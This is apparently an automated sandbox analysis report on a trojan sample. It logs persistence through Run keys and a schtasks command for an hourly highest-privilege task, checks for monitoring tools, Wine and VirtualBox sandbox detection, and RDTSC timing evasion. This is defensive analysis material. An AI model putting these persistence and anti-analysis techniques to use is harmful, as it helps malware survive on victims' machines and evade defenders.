barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ad0e9cf6d6.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Creates job files (autostart)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ad0e9cf6d6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ad0e9cf6d6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73E4 second address: CF73F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F3620DECF86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73F1 second address: CF73F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73F5 second address: CF73FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73FB second address: CF7405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3620BBB046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7405 second address: CF742B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3620DECF8Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3620DECF92h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF742B second address: CF742F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF76AB second address: CF76B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3620DECF86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF76B5 second address: CF76C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3620BBB04Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF76C9 second address: CF76CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7854 second address: CF785E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3620BBB046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF785E second address: CF787A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3620DECF86h 0x00000009 jmp 00007F3620DECF91h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF787A second address: CF7884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
